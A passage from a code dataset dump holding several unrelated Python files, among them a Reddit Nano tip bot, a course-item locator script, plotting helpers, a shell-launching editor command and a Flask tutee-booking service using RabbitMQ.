lambd=0.01, batch_size=1, seed=1) # initialize an NN\n\n MNN.train(x_train, y_train, max_iter=10)\n print(\"train:\")\n MNN.test(x_train, y_train)\n print(\"test:\")\n MNN.test(x_test, y_test)\n\n # plot the samples\n c1 = x[y == 0]\n c2 = x[y == 1]\n plt.plot(c1[:, 0], c1[:, 1], '.b')\n plt.plot(c2[:, 0], c2[:, 1], '.r')\n plt.show()\n\n\n\n\n\n# In[ ]:\n\n\n\n\n", "sub_path": "projects/MiniNN.py", "file_name": "MiniNN.py", "file_ext": "py", "file_size_in_byte": 9593, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.set_printoptions", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.outer", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 189, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 191, "usage_type": "attribute"}, {"api_name": "sklearn.utils.gen_batches", "line_number": 198, "usage_type": "call"}, {"api_name": "sklearn.datasets.make_classification", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 222, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 241, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 241, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 242, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 243, "usage_type": "name"}]} +{"seq_id": "593843139", "text": "'''\r\n@author: Quyen Doan, https://github.com/qdoan1651/DevMathPython\r\n@file: mtmf/course_workspace_update/extract_exercises_location_v1.py\r\n@desc: Extract location for a list of exercise items in the course \r\n for verification of course workspace update. \r\n'''\r\nimport logging, os\r\nfrom myutils import utils_files_io\r\n\r\ndef process_json_into_hash_table(filename):\r\n course_items = {}\r\n \r\n jo = utils_files_io.read_json_from_file(filename)\r\n \r\n print('Processing JSON into hash table for searching...')\r\n logging.info(' *********************************************')\r\n logging.info(' * Processing JSON into hash table...')\r\n logging.info(' *********************************************')\r\n for item in jo:\r\n is_hidden = item['suppressed']\r\n category_type = item['categoryType']\r\n if category_type == 'assignment':\r\n assignment_number = item['ordinal']\r\n assignment_name = item['title']\r\n logging.info(' Processing assignment {}. {}'.format(assignment_number, assignment_name))\r\n \r\n lo_number = 1\r\n for learning_outcome in item['learningOutcomes']:\r\n module_name = learning_outcome['title']\r\n for learning_objective in learning_outcome['learningObjectives']:\r\n lo_name = learning_objective['label']\r\n logging.info(' Processing LO {}. {} ({})'.format(lo_number, lo_name, module_name))\r\n \r\n for question_number, cgid in enumerate(learning_objective['standardExerciseItemCgis']):\r\n logging.info(' Processing CGID {}...'.format(cgid))\r\n course_items[cgid] = '{}; {}; {}; {} ({}); {}; {}'.format(assignment_number, assignment_name, \r\n lo_number, lo_name, module_name,\r\n question_number + 1, is_hidden)\r\n lo_number = lo_number + 1\r\n utils_files_io.write_json_to_file(course_items, 'C:/Workspace/Sandbox/temp.json')\r\n return course_items\r\n\r\ndef locate_single_item_in_courses(item, courses_list):\r\n result = {'active': [], 'hidden': [], 'not_found': [], 'count': {}}\r\n \r\n dirname = 'C:/Workspace/DevMath/Course Workspace Update/2018 Fall Courses/JSON'\r\n for course in courses_list:\r\n print('Processing course {}...'.format(course))\r\n filename = os.path.join(dirname, course + '.json')\r\n course_items = process_json_into_hash_table(filename)\r\n if item in course_items.keys():\r\n info = course_items[item]\r\n if info.split('; ')[-1] == 'False':\r\n result['active'].append(course + '; ' + info)\r\n else:\r\n result['hidden'].append(course + '; ' + info)\r\n else:\r\n result['not_found'].append(course)\r\n \r\n result['count']['active'] = len(result['active'])\r\n result['count']['hidden'] = len(result['hidden'])\r\n result['count']['not_found'] = len(result['not_found'])\r\n\r\n outfile = 'C:/Workspace/Sandbox/out(LJAATHP866MLZB5B9643).json'\r\n msg = 'Writing result to file {}...'.format(outfile)\r\n print(msg); logging.info(' ' + msg)\r\n utils_files_io.write_json_to_file(result, outfile)\r\n\r\ndef locate_items_in_courses(items_list, courses_list, outfile):\r\n result = {}\r\n \r\n dirname = 'C:/Workspace/DevMath/Course Workspace Update/2019 Spring Courses/JSON'\r\n for course in courses_list:\r\n print('Processing course {}...'.format(course))\r\n if course not in result.keys():\r\n result[course] = {}\r\n else:\r\n print('*** Warning: Course {} appears previously.'.format(course))\r\n filename = os.path.join(dirname, course + '.json')\r\n course_items = process_json_into_hash_table(filename)\r\n for item in items_list:\r\n if item in course_items.keys():\r\n info = course_items[item]\r\n if info.split('; ')[-1] == 'False':\r\n result[course][item] = info\r\n else:\r\n result[course][item] = '[Hidden] ' + info\r\n else:\r\n result[course][item] = '[Not Found] '\r\n \r\n msg = 'Writing result to file {}...'.format(outfile)\r\n print(msg); logging.info(' ' + msg)\r\n utils_files_io.write_json_to_file(result, outfile)\r\n \r\nif __name__ == '__main__':\r\n log_file = 'C:/Workspace/Sandbox/log.txt';\r\n if os.path.isfile(log_file): os.remove(log_file)\r\n logging.basicConfig(filename = log_file, level=logging.INFO)\r\n \r\n ''' Get list of courses '''\r\n courses_list = utils_files_io.read_list_from_file('courses_list_batch4.txt')\r\n \r\n ''' Get items list '''\r\n items_list = utils_files_io.read_list_from_file('items_list_cd22.txt')\r\n \r\n ''' Locate items in courses '''\r\n locate_items_in_courses(items_list, courses_list, 'items_location_batch4.json')\r\n\r\n# start = time.time()\r\n# elapsed = time.time() - start\r\n# print('Elapsed: %10.3f' %elapsed)\r\n \r\n \r\n", "sub_path": "DevMathPython/course_workspace_update/xothers/spring2019_batch4_prep/locate_items.py", "file_name": "locate_items.py", "file_ext": "py", "file_size_in_byte": 5154, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "myutils.utils_files_io.read_json_from_file", "line_number": 13, "usage_type": "call"}, {"api_name": "myutils.utils_files_io", "line_number": 13, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 18, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 35, "usage_type": "call"}, {"api_name": "myutils.utils_files_io.write_json_to_file", "line_number": 40, "usage_type": "call"}, {"api_name": "myutils.utils_files_io", "line_number": 40, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 66, "usage_type": "call"}, {"api_name": "myutils.utils_files_io.write_json_to_file", "line_number": 67, "usage_type": "call"}, {"api_name": "myutils.utils_files_io", "line_number": 67, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 92, "usage_type": "call"}, {"api_name": "myutils.utils_files_io.write_json_to_file", "line_number": 93, "usage_type": "call"}, {"api_name": "myutils.utils_files_io", "line_number": 93, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 97, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 98, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 98, "usage_type": "attribute"}, {"api_name": "myutils.utils_files_io.read_list_from_file", "line_number": 101, "usage_type": "call"}, {"api_name": "myutils.utils_files_io", "line_number": 101, "usage_type": "name"}, {"api_name": "myutils.utils_files_io.read_list_from_file", "line_number": 104, "usage_type": "call"}, {"api_name": "myutils.utils_files_io", "line_number": 104, "usage_type": "name"}]} +{"seq_id": "491952498", "text": "import math\nimport sys\nimport traceback\n\nimport praw.exceptions\n\nimport util\n\n\nclass Tipper:\n def __init__(self, db, reddit_client, wallet_id, rest_wallet, log):\n self.wallet_id = wallet_id\n self.db = db\n self.reddit_client = reddit_client\n self.rest_wallet = rest_wallet\n self.log = log\n\n @util.handle_api_exceptions(max_attempts=3)\n def comment_reply(self, comment, reply_text):\n self.log.info(\"BOT MAKING COMMENT REPLY:\")\n self.log.info(reply_text)\n comment.reply(reply_text)\n\n @staticmethod\n def is_usd(amount):\n if amount.startswith(\"$\"):\n return True\n return False\n\n def send_tip(self, comment, amount, sender_user_address, receiving_address, receiving_user, prior_reply_text):\n try:\n rate = util.get_price()\n if rate is None:\n raise ValueError('Could not retrieve rate')\n\n formatted_rate = str(format(float(rate), '.3f'))\n formatted_amount = amount\n if self.is_usd(amount):\n amount = amount[1:]\n usd = amount\n formatted_usd = usd\n amount = float(amount) / rate\n formatted_amount = str(format(float(amount), '.6f'))\n else:\n usd = float(amount) * rate\n formatted_usd = str(format(float(usd), '.3f'))\n\n self.log.info(\"Sending amount: \" + str(amount) + \"NANO, $\" + str(usd))\n data = {'action': 'account_balance',\n 'account': sender_user_address}\n post_body = self.rest_wallet.post_to_wallet(data, self.log)\n data = {'action': 'rai_from_raw', 'amount': int(\n post_body['balance'])}\n rai_balance = self.rest_wallet.post_to_wallet(data, self.log)\n\n # float of total send\n float_amount = float(amount)\n if float_amount > 0:\n rai_send = float_amount * 1000000\n raw_send = str(int(rai_send)) + '000000000000000000000000'\n self.log.info(\"Current rai balance: \" + str(rai_balance['amount']))\n\n # Add prior reply text to new\n reply_text = \"\"\n\n if prior_reply_text is not None:\n reply_text = prior_reply_text + \"\\n\\n\"\n\n # check amount left\n if int(rai_send) <= int(rai_balance['amount']):\n self.log.info('Tipping now')\n data = {'action': 'send', 'wallet': self.wallet_id, 'source': sender_user_address,\n 'destination': receiving_address, 'amount': int(raw_send)}\n post_body = self.rest_wallet.post_to_wallet(data, self.log)\n reply_text = reply_text + \\\n 'Tipped %s NANO or $%s to /u/%s\\n\\nUSD conversion rate of $%s per NANO from [Coin Market Cap](https://coinmarketcap.com/currencies/nano/)\\n\\n[Block Link](https://www.nanode.co/block/%s)' \\\n % (formatted_amount, formatted_usd, receiving_user, formatted_rate,\n str(post_body['block']))\n reply_text = reply_text + \" \\n\\nGo to the [wiki]\" + \\\n \"(https://np.reddit.com/r/NANO_tipbot/wiki/start) for more info\"\n else:\n reply_text = reply_text + 'Not enough in your account to tip'\n\n self.comment_reply(comment, reply_text)\n except TypeError as e:\n reply_message = 'An error came up, your request could not be processed\\n\\n' + \\\n ' Paging /u/valentulus_menskr error id: ' + comment.fullname + '\\n\\n'\n self.comment_reply(comment, reply_message)\n tb = traceback.format_exc()\n self.log.error(e)\n self.log.error(tb)\n except:\n reply_message = 'An error came up, your request could not be processed\\n\\n' + \\\n ' Paging /u/valentulus_menskr error id: ' + comment.fullname + '\\n\\n'\n self.comment_reply(comment, reply_message)\n self.log.error(\"Unexpected error in send_tip: \" + str(sys.exc_info()[0]))\n tb = traceback.format_exc()\n self.log.error(tb)\n\n def process_tip(self, amount, comment, receiving_user):\n if receiving_user.lower() == 'giftnano':\n receiving_user = 'giftxrb'\n user_table = self.db['user']\n comment_table = self.db['comments']\n\n # See if we have an author xrb address and a to xrb address, if not invite to register\n self.log.info(\"Looking for sender \" + \"'\" + comment.author.name + \"'\" + \" in db\")\n\n sender_user_data = util.find_user(comment.author.name, self.log, self.db)\n\n if sender_user_data is not None:\n self.log.info('Sender in db')\n # Author registered\n sender_user_address = sender_user_data['xrb_address']\n\n reply_text = None\n\n user_data = util.find_user(receiving_user, self.log, self.db)\n if user_data is not None:\n receiving_address = user_data['xrb_address']\n else:\n self.log.info(\"Receiving User \" + \"'\" + receiving_user + \"'\" + \" Not in DB - registering\")\n # Generate address\n data = {'action': 'account_create',\n 'wallet': self.wallet_id}\n post_body = self.rest_wallet.post_to_wallet(data, self.log)\n self.log.info(\"Receiving User new account: \" + str(post_body['account']))\n\n # Add to database\n record = dict(user_id=receiving_user, xrb_address=post_body['account'])\n self.log.info(\"Inserting into db: \" + str(record))\n user_table.insert(record)\n receiving_address = post_body['account']\n\n reply_text = str(receiving_user) \\\n + ' isn\\'t registered, so I made an account for them. ' \\\n + 'They can access it by messaging the bot.'\n\n self.send_tip(comment, amount, sender_user_address, receiving_address, receiving_user, reply_text)\n\n else:\n self.log.info('Sender NOT in db')\n reply_text = 'Hi /u/' + str(comment.author.name) + ', please register with the bot by sending it a' \\\n + ' private message with the text \"register\" in the body of the message. \\n\\nGo to the [wiki]' + \\\n \"(https://np.reddit.com/r/NANO_tipbot/wiki/start) for more info\"\n\n self.comment_reply(comment, reply_text)\n\n # Add to db\n record = dict(\n comment_id=comment.fullname, to=receiving_user, amount=amount, author=comment.author.name)\n self.log.info(\"Inserting into db: \" + str(record))\n comment_table.insert(record)\n self.log.info('DB updated')\n\n @staticmethod\n def isfloat(value):\n try:\n if len(value) > 0 and value.startswith(\"$\"):\n value = value[1:]\n\n float_val = float(value)\n if not math.isnan(float_val):\n return True\n except ValueError:\n return False\n return False\n\n @staticmethod\n def parse_user(user):\n if user.startswith('/u/'):\n user = user[3:]\n return user\n\n def user_exists(self, user):\n exists = True\n try:\n self.reddit_client.redditor(user).fullname\n except praw.exceptions.PRAWException:\n self.log.error(\"User '\" + user + \"' not found\")\n exists = False\n except:\n self.log.error(\"Unexpected error in send_tip: \" + str(sys.exc_info()[0]))\n tb = traceback.format_exc()\n self.log.error(tb)\n exists = False\n return exists\n\n def invalid_formatting(self, comment, mention):\n comment_table = self.db['comments']\n self.log.info('Invalid formatting')\n if comment.author.name.lower() != 'raiblocks_tipbot' and comment.author.name.lower() != 'nano_tipbot' and comment.author.name.lower() != 'nano4u':\n if mention:\n self.comment_reply(comment, 'Was I mentioned? I could not parse your request \\n\\nGo to the [wiki]' +\n '(https://np.reddit.com/r/NANO_tipbot/wiki/start) to learn how to tip with' +\n ' NANO')\n else:\n self.comment_reply(comment,\n 'Tip command is invalid. Tip with any of the following formats: \\n\\n' +\n '`!tipNANO ` \\n\\n`/u/NANO_TipBot ` \\n\\n'\n + '`/u/NANO4U ` \\n\\nGo to the [wiki]' +\n '(https://np.reddit.com/r/NANO_tipbot/wiki/start) for more commands')\n record = dict(\n comment_id=comment.fullname, to=None, amount=None, author=comment.author.name)\n self.log.info(\"Inserting into db: \" + str(record))\n comment_table.insert(record)\n self.log.info('DB updated')\n\n def process_command(self, comment, receiving_user, amount):\n # parse reddit username\n receiving_user = self.parse_user(receiving_user)\n self.log.info(\"Receiving user: \" + receiving_user)\n self.process_tip(amount, comment, receiving_user)\n\n def validate_double_parameter_tip(self, parts_of_comment, command_index):\n receiving_user = parts_of_comment[command_index + 1]\n amount = parts_of_comment[command_index + 2]\n passing = False\n if self.isfloat(amount):\n # valid amount input\n # parse reddit username\n receiving_user = self.parse_user(receiving_user)\n # check if that is a valid reddit\n if self.user_exists(receiving_user):\n passing = True\n\n return passing\n\n def validate_single_parameter_tip(self, parts_of_comment, command_index):\n # check that index+1 is a float before proceeding to extract receiving_user\n amount = parts_of_comment[command_index + 1]\n if self.isfloat(amount):\n return True\n return False\n\n def process_single_parameter_tip(self, comment, amount):\n # Is this a root comment?\n is_root = comment.is_root\n self.log.info(\"Root comment? \" + str(comment.is_root))\n if is_root:\n receiving_user = comment.link_author\n else:\n # Get parent\n parent = comment.parent()\n receiving_user = parent.author.name\n self.log.info(\"Parent: \")\n self.log.info(vars(parent))\n\n self.process_command(comment, receiving_user, amount)\n\n def parse_tip(self, comment, parts_of_comment, command_index, mention):\n # get a reference to the table 'comments'\n comment_table = self.db['comments']\n\n # Save the comment id in a database so we don't repeat this\n if comment_table.find_one(comment_id=comment.fullname):\n self.log.info('Already in db, ignore')\n else:\n author = comment.author.name.lower()\n try:\n subreddit_name = comment.subreddit.display_name;\n except:\n subreddit_name = ''\n\n if author != \"reddit\" and author != \"xrb4u\" and author != \"raiblocks_tipbot\" and author != \"giftxrb\" \\\n and author != \"automoderator\" and author != \"giftnano\" and author != \"nano_tipbot\" and author != \"nano4u\" and subreddit_name.lower() != \"cryptocurrency\":\n length = len(parts_of_comment)\n passing = False\n\n # check that index+2 exists in array\n if command_index + 2 < length:\n # check for both tip formats\n # !tipxrb \n # !tipxrb \n receiving_user = parts_of_comment[command_index + 1]\n amount = parts_of_comment[command_index + 2]\n if self.validate_double_parameter_tip(parts_of_comment, command_index):\n self.process_command(comment, receiving_user, amount)\n passing = True\n elif self.validate_single_parameter_tip(parts_of_comment, command_index):\n amount = parts_of_comment[command_index + 1]\n self.process_single_parameter_tip(comment, amount)\n passing = True\n\n elif command_index + 1 < length:\n # check for one tip format\n # !tipxrb \n if self.validate_single_parameter_tip(parts_of_comment, command_index):\n amount = parts_of_comment[command_index + 1]\n self.process_single_parameter_tip(comment, amount)\n passing = True\n\n if not passing:\n # invalid command\n self.invalid_formatting(comment, mention)\n else:\n # Add to db\n record = dict(\n comment_id=comment.fullname, to=None, amount=None, author=comment.author.name)\n self.log.info(\"Inserting into db: \" + str(record))\n comment_table.insert(record)\n self.log.info('DB updated')\n\n def parse_comment(self, comment, commands, mention):\n comment_split_newlines = comment.body.lower().splitlines()\n found = False\n for line in comment_split_newlines:\n parts_of_comment = line.split(\" \")\n for command in commands:\n command = command.lower()\n if command in parts_of_comment and not found:\n found = True\n self.log.info('\\n\\n')\n self.log.info('Found tip reference in comments')\n self.log.info(\"Comment is as follows:\")\n self.log.info((vars(comment)))\n\n command_index = parts_of_comment.index(command)\n self.parse_tip(comment, parts_of_comment, command_index, mention)\n", "sub_path": "tipper.py", "file_name": "tipper.py", "file_ext": "py", "file_size_in_byte": 14299, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "util.handle_api_exceptions", "line_number": 18, "usage_type": "call"}, {"api_name": "util.get_price", "line_number": 32, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 96, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 97, "usage_type": "call"}, {"api_name": "util.find_user", "line_number": 109, "usage_type": "call"}, {"api_name": "util.find_user", "line_number": 118, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 163, "usage_type": "call"}, {"api_name": "praw.exceptions.exceptions", "line_number": 179, "usage_type": "attribute"}, {"api_name": "praw.exceptions", "line_number": 179, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 183, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 184, "usage_type": "call"}]} +{"seq_id": "19102055", "text": "import matplotlib.pyplot as plt\n\n# sort the data and make a graph\ndef show_graph(graph, title, xlabel, ylabel):\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.plot(*zip(*sorted(graph.items())))\n \n \ndef show_two_graphs(graph1, graph2, title, xlabel, ylabel):\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.plot(*zip(*sorted(graph1.items())), label='one_level')\n plt.plot(*zip(*sorted(graph2.items())), label='two_level')\n plt.legend(loc=2)\n \n\n", "sub_path": "Ipython/Training/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 513, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.title", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 6, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "219965436", "text": "\"\"\" A command that starts a shell (aka command prompt). \"\"\"\n\n\nimport os\nimport subprocess\nimport threading\n\nfrom pgv.red.api import Module, Package, PythonNamespace\n\n\nclass StartShell(object):\n \"\"\" Start a new shell at the package containing the the current name. \"\"\"\n\n COMMAND_TEMPLATE = r'start cmd /k \"cd {dirname} & ls\"'\n\n #### 'object' protocol #####################################################\n\n def __call__(self, window):\n \"\"\" Start a new shell at the package containing the current name. \"\"\"\n\n red = window.red\n name = red.name\n\n # I find that I tend to typeahead a dot automatically and it seems nice\n # to just ignore it in terms of command execution.\n if name.endswith('.'):\n name = name[:-1]\n\n # If the current name is empty then do nothing!\n if len(name) > 0:\n node = red.lookup(name)\n if node is not None:\n dirname = self._get_appropriate_directory_for_node(node)\n command = self._get_command(dirname)\n self._run_command_in_new_thread(command)\n\n return\n\n #### Private protocol ######################################################\n\n def _get_appropriate_directory_for_node(self, node):\n \"\"\" Return an appropriate directory for the given node.\n\n If the node is a Package, use the, errr, package directory.\n If the node is a Module use the directory it is in.\n If the node is an Attribute, Function or Klass then use the directory\n that contains the module it is in!\n\n \"\"\"\n\n if isinstance(node, Package):\n dirname = node.filename\n\n elif isinstance(node, Module):\n dirname = os.path.dirname(node.filename)\n\n else:\n dirname = os.path.dirname(node.module.filename)\n\n return dirname\n\n def _get_command(self, dirname):\n \"\"\" Get the command. \"\"\"\n\n command = self.COMMAND_TEMPLATE.format(dirname=dirname)\n\n return command\n\n def _run_command_in_new_thread(self, command):\n \"\"\" Run the given command in a separate thread. \"\"\"\n\n thread = threading.Thread(\n None, subprocess.call, args=(command,), kwargs={'shell':True}\n )\n thread.start()\n\n return\n\n#### EOF #######################################################################\n", "sub_path": "source/pgv/red/ui/commands/start_shell.py", "file_name": "start_shell.py", "file_ext": "py", "file_size_in_byte": 2374, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pgv.red.api.Package", "line_number": 51, "usage_type": "argument"}, {"api_name": "pgv.red.api.Module", "line_number": 54, "usage_type": "argument"}, {"api_name": "os.path.dirname", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 72, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 73, "usage_type": "attribute"}]} +{"seq_id": "533274301", "text": "import json\nimport sys\nimport os\nimport pika\n\nfrom flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom os import environ\n\nimport requests\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://root@localhost:3306/tutee'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nCORS(app)\n\nclass Tutee(db.Model):\n __tablename__ = 'tutee'\n\n tutee_id = db.Column(db.String(64), primary_key = True) #email\n contact_number = db.Column(db.String(8), nullable = False)\n name = db.Column(db.String(64), nullable = False)\n gender = db.Column(db.String(1), nullable = False)\n age = db.Column(db.Integer, nullable = False)\n address = db.Column(db.String(64), nullable = False)\n password_hash = db.Column(db.String(64), nullable = False)\n\n def __init__(self, tutee_id, contact_number, name, gender, age, address, password_hash):\n self.tutee_id = tutee_id\n self.contact_number = contact_number\n self.name = name\n self.gender = gender\n self.age = age\n self.address = address\n self.password_hash = password_hash\n\n def json(self):\n return {\"tutee_id\": self.tutee_id, \"contact_number\": self.contact_number, \n \"name\": self.name, \"gender\": self.gender, \n \"age\": self.age, \"address\": self.address, \n \"password_hash\": self.password_hash}\n\n\n@app.route(\"/tutee\")\ndef get_all():\n return jsonify({\"tutees\": [tutee.json() for tutee in Tutee.query.all()]})\n\n\n@app.route(\"/tutee/\")\ndef find_by_tutee_id(tutee_id):\n tutee = Tutee.query.filter_by(tutee_id=tutee_id).first()\n if tutee:\n return jsonify(tutee.json())\n return jsonify({\"message\": \"Tutee not found\"}), 404\n\n\n@app.route(\"/tutee/\", methods=['POST'])\ndef create_tutee_profile(tutee_id):\n if (Tutee.query.filter_by(tutee_id=tutee_id).first()):\n return jsonify({\"message\": \"A tutee with username '{}' already exists.\".format(tutee_id)}), 400\n\n data = request.get_json() # this json object should not have tutee_id\n tutee = Tutee(tutee_id, **data) # add everything in data\n\n try:\n db.session.add(tutee)\n db.session.commit()\n except:\n return jsonify({\"message\": \"An error occurred registering the tutee.\"}), 500\n\n return jsonify(tutee.json()), 201\n\n\n@app.route(\"/tutee/subject/\")\ndef filter_by_Tutee_subject(subject):\n tutor = Tutor.query.filter_by(subject=subject).first()\n if tutor:\n return jsonify({\"Tutor\": [tutor.json() for tutor in Tutor.query.filter_by(subject=subject).all()]})\n return jsonify({\"message\": \"Profile not found.\"}), 404\n\n\n@app.route(\"/tutee/level/\")\ndef filter_by_Tutee_levels(level):\n tutee= Tutee.query.filter_by(level=level).first()\n if tutee:\n return jsonify({\"Tutee\": [tutee.json() for tutee in Tutee.query.filter_by(level=level).all()]})\n return jsonify({\"message\": \"Profile not found.\"}), 404\n\n\n# attritubutes that can be updated:\n# email, contact, name, address, subject_rate\n@app.route(\"/tutee/update/\", methods=['POST'])\ndef update_tutee_profile(tutee_id):\n if (not Tutee.query.filter_by(tutee_id=tutee_id).first()):\n return jsonify({\"message\": \"A tutee with tutee_id '{}' does not exist.\".format(tutee_id)}), 400\n\n data = request.get_json()\n tutee = Tutee.query.filter_by(tutee_id=tutee_id).first()\n\n for key, value in data.items():\n try:\n setattr(tutee, key, value)\n except:\n return jsonify({\"message\": \"An error occurred updating '{}'.\".format(key)}), 500\n db.session.commit()\n\n return jsonify({\"message\": \"Update successful.\"}), 201\n\n\n@app.route(\"/tutee/request\", methods = ['POST'])\ndef create_request():\n \"\"\"Create a new order according to the order_input\"\"\"\n status = 200\n message = \"Success\"\n\n data = request.get_json()\n tutee_id = data[\"tutee_id\"]\n tutor_id = data[\"tutor_id\"]\n subject = data[\"subject\"]\n\n booking_id = tutor_id + subject + tutee_id.split(\"@\")[0]\n json_obj = {\"booking_id\": booking_id, \"tutor_id\": tutor_id, \"subject\": subject, \"tutee_id\": tutee_id}\n\n return send_request(json_obj)\n\n\ndef send_request(request):\n \"\"\"inform Tutor/Booking Management as needed\"\"\"\n hostname = \"localhost\"\n port = 5672 # default messaging port.\n # connect to the broker and set up a communication channel in the connection\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=hostname, port=port))\n channel = connection.channel()\n\n # set up the exchange if the exchange doesn't exist\n exchangename=\"tutee_topic\"\n channel.exchange_declare(exchange=exchangename, exchange_type='topic')\n\n # prepare the message body content\n message = json.dumps(request, default=str) # convert a JSON object to a string\n\n channel.queue_declare(queue='booking', durable=True)\n channel.queue_bind(exchange=exchangename, queue='booking', routing_key='#')\n\n channel.basic_publish(exchange=exchangename, routing_key=\"tutee.request\", body=message,\n properties=pika.BasicProperties(delivery_mode = 2) # make message persistent within the matching queues until it is received by some receiver (the matching queues have to exist and be durable and bound to the exchange)\n )\n \n print(\"Order sent to RequestTutor service.\")\n connection.close()\n return jsonify(request), 201\n\nviewbookingsURL = \"http://localhost:5002/booking/tutee/\"\ndef view_bookings(tutee_id):\n tutee_id = json.loads(json.dumps(tutee_id, default=str))\n bookings = requests.post(viewbookingsURL, json = tutee_id)\n #display bookings\n print(bookings)\n\nviewspecificbookingURL = \"http://localhost:5002/booking/\"\ndef view_particular_booking(booking_id):\n booking_id = json.loads(json.dumps(booking_id, default=str))\n booking = requests.post(viewspecificbookingURL, json = booking_id)\n #display bookings\n print(booking)\n\nfilterbookingbystatusURL = \"http://localhost:5002/booking/status//tutee/\"\ndef filter_by_booking_status(status):\n status = json.loads(json.dumps(status, default=str))\n bookings = requests.post(filterbookingbystatusURL, json = status)\n 